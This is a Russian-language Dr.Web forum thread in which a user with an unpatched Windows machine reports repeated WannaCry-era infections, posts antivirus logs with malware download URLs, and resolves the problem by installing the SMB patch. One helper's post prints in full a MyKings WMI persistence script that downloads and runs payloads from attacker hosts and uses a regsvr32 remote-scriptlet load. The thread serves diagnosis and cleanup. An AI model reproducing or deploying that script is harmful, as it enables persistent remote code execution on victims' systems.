24 ответов в этой теме

[Hackcraft]

Здравствуйте. Купил Dr.Web Security Space, установил его на чистую Windows, так как прошлая была заражена какими-то троянцами, и на следующее же утро вновь подвергся заражению/атакам вирусов. 

 

Давайте по-порядку. То что у меня было на предыдущей версии Windows точь-в-точь описано в данном посте другим пользователем - и спасибо ему за это.

 

https://forum.drweb.com/index.php?showtopic=327461&p=827106

 

Антивирус Norton постоянно лишь удалял некие item.dat в папке windows/debug, Касперский вылечил некую WMI заразу, однако его отключение на полчаса (с целью сканирования другим софтом), вновь приводило к появлении заразы в каталоге windows под названием "mssecsvc.exe", которая, по памяти использования Нортона, и качала некий item.dat.

 

Пригласил в гости соседа-сисадмина с целью переустановки Windows с полным форматированием. Перед её выполнением он поинтересовался, что у меня в процессах - там под WMIPrvSE были запущены пара процессов iexplore.exe, которые игнорировал Касперский. Dr.Web CureIt вообще ни разу ничего не находил, но возможно потому, что всё подчистил тот же Касперский.

 

Windows переустановлена вчера вечером. После 4ех часов работы за компьютером (Посещение официальных сайтов аля yandex, vk, youtube, twitch.tv) и лишь одного сомнительного - fanserials.tv, где я разрешал запуск flash, чтобы посмотреть серию любимого сериала, я заметил следующий запущенный процесс из данного пути:

 

C:\\$36OSection\Ctfmon.exe, который игнорировал Dr.Web, однако я смог открыть папку с данным файлом, и просканировав его узнал, что это троянец, имя которому:

 

Trojan.Downloader24.59532.

 

После этого я полез в лог Dr.Web, и оказалось, что Dr.Web уже много чего поймал, а именно:

 

Дата: 20.05.2017 11:14 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: mssecsvc.exe
Угроза: Trojan.Encoder.11432
Действие: Удалено
Путь: C:/windows/mssecsvc.exe     Дата: 20.05.2017 10:44 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза     Дата: 20.05.2017 7:23 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: xzz[1].exe
Угроза: BackDoor.Graybird.75
Действие: Удалено
Путь: C:/windows/system32/config/systemprofile/appdata/local/microsoft/windows/temporary internet files/content.ie5/xzz[1].exe     Дата: 20.05.2017 7:23 Компонент: SpIDer Gate Код: 100 Событие: Угроза заблокирована Сведения: Объект: xzz.exe
Угроза: BackDoor.Graybird.75
Действие: Заблокировано
Путь: http://xz.0317168.com:98/xzz.exe     Сведения: Объект: explorer.exe
Угроза: Trojan.DownLoader24.59532
Действие: Удалено
Путь: C:/windows/fonts/explorer.exe     Дата: 20.05.2017 10:44 Компонент: SpIDer Gate Код: 100 Событие: Угроза заблокирована Сведения: Объект: 55.exe
Угроза: Trojan.DownLoader24.59532
Действие: Заблокировано
Путь: http://219.250.59.5:5687/55.exe   Дата: 20.05.2017 7:23 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: m.exe
Угроза: BackDoor.Graybird.75
Действие: Удалено
Путь: C:/users/m.exe   После этого я сделал полное сканирование компьютера, которое наконец нашло то, что я нашел первым - и "переместило" его.   После перезагрузки Windows я обнаружил экран выбора пользователя - Администратора меня, и другого, имя которого я напишу позже (этого не было утром, но по памяти не помню). А пока что я прилагаю логи Hijackthis. Лог Dr.Web слишком велик для загрузки. Подскажите по дальнейшим шагам, пожалуйста.              

 

 

 

[Dr.Robot]

1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,

Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ - сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.

2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,

- попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
- детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
- дождаться ответа аналитика или хелпера;

3. Если у Вас зашифрованы файлы,

Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.

Что НЕ нужно делать:
- лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
- переустанавливать операционную систему;
- менять расширение у зашифрованных файлов;
- очищать папки с временными файлами, а также историю браузера;
- использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из "Аптечки сисадмина" Dr. Web;
- использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.

Что необходимо сделать:
- прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба - это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];


4. При возникновении проблем с интернетом, таких как "не открываются сайты", в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа "Содержание сайта заблокировано" и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig


Для этого проделайте следующее:

• Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить...
• В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
• Напишите в этом черном окне команду ipconfig /all>"%userprofile%\ipc.log" и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,"%userprofile%\ipc.log" и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
• Приложите этот файл к своему сообщению на форуме.

Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.

[Hackcraft]

Имя появившегося юзера: ASP.USER

 

Часть лог файла Dr.Web, который не влезает в загрузку:

 

Anti-rootkit module version ( ver: 11.1.201703200, api: 8.06 )

 

Using 135418235 as Dr.Web ® Key file

 

OPTION [Automatic Apply Actions] YES

OPTION [Turn Off Computer After Scan] NO

OPTION [Use Sound Alerts] NO

 

Using language: "╨а╤Г╤Б╤Б╨║╨╕╨╣"

-----------------------------------------------------------------------------

Start scanning

-----------------------------------------------------------------------------

Command line used:/OK /HA /AR /MA /AC /SCC /SCN /SPN /SST /FL-:"C:\Users\836D~1\AppData\Local\Temp\dwlC806.tmp" 

 

Limit the use of the computer resources to 50%

Instances used for this session: 1

Object(s) to scan:

 - List from file C:\Users\836D~1\AppData\Local\Temp\dwlC806.tmp

 

Files excluded from scaning: 

 - D:\APPS

 - C:\APPS

 

>C:\$36OSection\Ctfmon.exe is RAR archive

C:\$36OSection\Ctfmon.exe\CMT - Ok

C:\$36OSection\Ctfmon.exe\3.bat - Ok

C:\$36OSection\Ctfmon.exe\explorer.exe - infected with Trojan.DownLoader24.59532

C:\$36OSection\Ctfmon.exe\explorer.exe - infected, incurable

C:\$36OSection\Ctfmon.exe\restart.reg - Ok

C:\$36OSection\Ctfmon.exe\server.reg - Ok

C:\$36OSection\Ctfmon.exe\Tnteime.exe - Ok

C:\$36OSection\Ctfmon.exe - infected archive

C:\$36OSection\Ctfmon.exe - infected archive, delete error - 935ms, 6980948 bytes

 

Total 6980948 bytes in 1 file scanned (7 objects, 1 container)

Total 0 files (5 objects) are clean

Total 1 file is infected

Total 1 file has raised error condition

Scan time is 00:00:01.884

[Hackcraft]

Сжатые версии логов полной проверки с перемещением одного из троянов, dwsysinfo, новый HiJackThis.

 

 

[Hackcraft]

Дата: 20.05.2017 16:10 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: mssecsvc.exe
Угроза: Trojan.Encoder.11432
Действие: Удалено
Путь: C:/windows/mssecsvc.exe     Новая угроза. Заходил либо ВКонтакте, либо само.

Сообщение было изменено Hackcraft: 20 Май 2017 - 16:31

[fetch]

У вас обновления винды установлены? В частности то, что закрывает дыру в SMB ?
Ammyy Admin вы сами ставили?

[Hackcraft]

Обновления не установлены, наверное. Ammyy Admin, да. Человек, что устанавливал винду вчера, установил. Мы соседи, так проще.

Сообщение было изменено Hackcraft: 20 Май 2017 - 16:36

[Hackcraft]

Почитал про последнее наименование троянца. Сам WannaCry? Проблемы на старой винде начались, вроде, в начале мая. Раньше, чем о нем заговорили в новостях.

 

Есть хоть какая-то информация, какие мои данные в опасности при установленном Dr.Web?

[Hackcraft]

Новое:

 

Дата: 20.05.2017 18:57 Компонент: SpIDer Gate Код: 100 Событие: Угроза заблокирована Сведения: Объект: a26ns.exe
Угроза: Trojan.PWS.Banks.641
Действие: Заблокировано
Путь: http://93.174.91.3/classes/a26ns.exe     Дата: 20.05.2017 18:57 Компонент: SpIDer Guard Код: 600 Событие: Обнаружена угроза Сведения: Объект: ll.exe
Угроза: Trojan.PWS.Banks.641
Действие: Удалено
Путь: C:/ll.exe    

[Dmitry Shutov]

Обновляйте операционную систему до актуального состояния, так и будет к вам дрянь стучатся. 

 

Пару троянов выслал в Вирлаб (по тем IP что вы указали, и мы не ловим).

[Dmitry Shutov]

http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu

[RomaNNN]

Файл C:\$36OSection\Ctfmon.exe остался? Можно его в личку? Движок на нем споткнулся.

[fetch]

Файл C:\$36OSection\Ctfmon.exe остался? Можно его в личку? Движок на нем споткнулся.

 

И мне заодно, пожалуйста.

[Gluzer]

Карантин почистили, зверушки не осталось. Есть вариант поднять содержимое C:\$36OSection\ через R-Studio, но это уже завтра. Сосед.

[Dmitry Shutov]

Файл C:\$36OSection\Ctfmon.exe остался? Можно его в личку? Движок на нем споткнулся.

 

 

Содержимое $36OSection\Ctfmon.exe это тоже самое что и  55.exe

 

Start scanning

-----------------------------------------------------------------------------

Command line used:/OK /HA /AR /MA /AC /SCC /SCN /SPN /SST /FL-:"C:\Users\DiMarik\AppData\Local\Temp\dwl6DE0.tmp" 

 

Limit the use of the computer resources to 50%

Instances used for this session: 10

Object(s) to scan:

 - List from file C:\Users\DiMarik\AppData\Local\Temp\dwl6DE0.tmp

 

 

>C:\Users\DiMarik\Downloads\Программы\55.exe is RAR archive

C:\Users\DiMarik\Downloads\Программы\55.exe\CMT - Ok

C:\Users\DiMarik\Downloads\Программы\55.exe\3.bat - Ok

C:\Users\DiMarik\Downloads\Программы\55.exe\explorer.exe - infected with Trojan.DownLoader24.59532

C:\Users\DiMarik\Downloads\Программы\55.exe\explorer.exe - infected

C:\Users\DiMarik\Downloads\Программы\55.exe\restart.reg - Ok

C:\Users\DiMarik\Downloads\Программы\55.exe\server.reg - Ok

C:\Users\DiMarik\Downloads\Программы\55.exe\Tnteime.exe - Ok

C:\Users\DiMarik\Downloads\Программы\55.exe - infected archive

C:\Users\DiMarik\Downloads\Программы\55.exe - infected archive - 758ms, 7029732 bytes

-----------------------------------------------------------------------------

Start curing

-----------------------------------------------------------------------------

 

C:\Users\DiMarik\Downloads\Программы\55.exe - quarantined - 5654 ms

 

Total 7029732 bytes in 1 file scanned (7 objects, 1 container)

Total 0 files (5 objects) are clean

Total 1 file is infected

Total 1 file is neutralized

Scan time is 00:00:00.758

 

Только тут двиг отработал без ошибки. 

[Hackcraft]

Я не совсем полностью понимаю эти вещи, но Ctfmon видел в процессах, и пока я принудительно не перешел к папке с файлом через диспетчер (ибо она скрыта, или это вообще память какая), Dr.Web на висящий в диспетчере процесс Ctfmon.exe (подпись Ctfmon.exe) просто не реагировал. Т.е другой подобный архив/файл был уже в каталоге Windows. Или запускался он не под моим пользователем.. описано ниже.

 

Сначала я принудительно просканировал сам файл - угроза найдена, но он не предпринял никаких действий (настройки ли это или ошибка?). Затем я выполнил фул скан - нашло опять только её, и переместило (т.е карантин. потеряло разрешение файла).

После лечения у меня были запущены 3 процесса iexplore.exe, а после загрузки Windows, она же предложила мне выбрать пользователя - какого-то нового ASP.USER или меня.

 

Обновил Windows сначала по патчу выше, а затем рекомендованные 111. Не знаю, помогла ли чистка каких-то левых ключей/программ "fuckyou" (да-да. руками нашли эту вещь, описанную в теме, линк на которую я привел в первом посте). Либо время ещё не пришло, либо мне всё же не стоит посещать fanserials.tv и включать на нем flash, для просмотра сериалов - но за время загрузки обновлений Windows (около 6ти часов) ко мне никто не стучался.

Сообщение было изменено Hackcraft: 21 Май 2017 - 07:12

[Hackcraft]

Итак. 6 часов работы вечером после установки

 

http://download.windowsupdate.com/d/msdownload/update/software/secu/2017/02/windows6.1-kb4012212-x64_2decefaa02e2058dcd965702509a992d8c4e92b3.msu

 

 

6 часов работы утром после установки 111 обновлений через Windows Update. Пока что ни одной заразы и предупреждения. Скорее всего, дело было в нашумевшей уязвимости Windows. Если так и останется, то эта тема вполне может послужить решением, если вы подвергаетесь подобным атакам вирусов в режиме афк.

 

Всем спасибо. Я подозревал, что обновление Windows - дельный совет. 

Сообщение было изменено Hackcraft: 21 Май 2017 - 12:30

[santy]

Не знаю, помогла ли чистка каких-то левых ключей/программ "fuckyou" (да-да. руками нашли эту вещь, описанную в теме, линк на которую я привел в первом посте). Либо время ещё не пришло, либо мне всё же не стоит посещать fanserials.tv и включать на нем flash, для просмотра сериалов - но за время загрузки обновлений Windows (около 6ти часов) ко мне никто не стучался.

а вот это как раз wmi-ный скрипт, через который могли быть добавлены в систему вредоносные файлики.

вот пример такого скрипта:

 

Полное имя                  WMI_ACTIVESCRIPTEVENTCONSUMER\FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Имя файла                   FUCKYOUMM2_CONSUMER.[FUCKYOUMM2_FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               fuckyoumm2_consumer
Consumer_Class              ActiveScriptEventConsumer
Consumer_ScriptingEngine    Jscript
Consumer_ScriptText         var toff=3000;var url1 = "хттп://wmi.mykings.top:8888/kill.html";http= new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr .split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="хттп://wmi.mykings.top:8888/test.html",http=newActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr .split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:хттп://js.mykings.top:280/v.sctscrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");
Filter_Name                 fuckyoumm2_filter
Filter_Class                __EventFilter
Filter_Query                select * from __timerevent where timerid="fuckyoumm2_itimer"
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "\\\\.\\root\\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"";
    Filter = "\\\\.\\root\\subscription:__EventFilter.Name=\"fuckyoumm2_filter\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    Name = "fuckyoumm2_filter";
    Query = "select * from __timerevent where timerid=\"fuckyoumm2_itimer\"";
    QueryLanguage = "wql";
};

#MOF_Consumer#              
instance of ActiveScriptEventConsumer
{
    Name = "fuckyoumm2_consumer";
    ScriptingEngine = "Jscript";
    ScriptText = "var toff=3000;var url1 = \"хттп://wmi.mykings.top:8888/kill.html\";http= new ActiveXObject(\"Msxml2.ServerXMLHTTP\");fso = new ActiveXObject(\"Scripting.FilesystemObject\");wsh = new ActiveXObject(\"WScript.Shell\");http.open(\"GET\", url1, false);http.send();str = http.responseText;arr = str.split(\"\\r\\n\");for (i = 0; i < arr.length; i++) { t = arr .split(\" \"); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run(\"taskkill /f /im \" + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject(\"WbemScripting.SWbemLocator\");var service=locator.ConnectServer(\".\",\"root/cimv2\");var colItems=service.ExecQuery(\"select * from Win32_Process\");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption==\"rundll32.exe\")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get(\"Win32_Process\");var url=\"хттп://wmi.mykings.top:8888/test.html\",http=newActiveXObject(\"Microsoft.XMLHTTP\"),ado=new ActiveXObject(\"ADODB.Stream\"),wsh=new ActiveXObject(\"WScript.Shell\");for(http.open(\"GET\",url,!1),http.send(),str=http.responseText,arr=str.split(\"\\r\\n\"),i=0;arr.length>i;i++)t=arr .split(\" \",3),http.open(\"GET\",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create(\"regsvr32 /s shell32.dll\");pp.create(\"regsvr32 /s WSHom.Ocx\");pp.create(\"regsvr32 /s scrrun.dll\");pp.create(\"regsvr32 /s c:\\\\Progra~1\\\\Common~1\\\\System\\\\Ado\\\\Msado15.dll\");pp.create(\"regsvr32 /s jscript.dll\");pp.create(\"regsvr32 /u /s /i:хттп://js.mykings.top:280/v.sctscrobj.dll\");pp.create(\"rundll32.exe c:\\\\windows\\\\debug\\\\item.dat,ServiceMain aaaa\");";
};

                            

 

это было найдено через Universal Virus Sniffer/uVS v 4.0.3

в вашей первой теме, скорее всего была эта же проблема.

 

если не трудно, добавьте образ автозапуска из uVS.

ссылка на актуальную версию.

Сообщение было изменено santy: 21 Май 2017 - 14:11

[Hackcraft]

Ох, надеюсь мне не скажется то, что я активно выполняю действия с компом разными левыми программами по просьбам из интернета.

 

И надеюсь, я выполнил всё правильно.

 

Есть какая информация по логу?

[santy]

Есть какая информация по логу?

судя по образу все ок.

в секции WMI пусто, нет левых скриптов.

uVS вообщем-то известная программа, используется на форумах Virusinfo, ESET, LK, да и на форуме DrWeb известна, хотя реже используется.

Сообщение было изменено santy: 21 Май 2017 - 16:40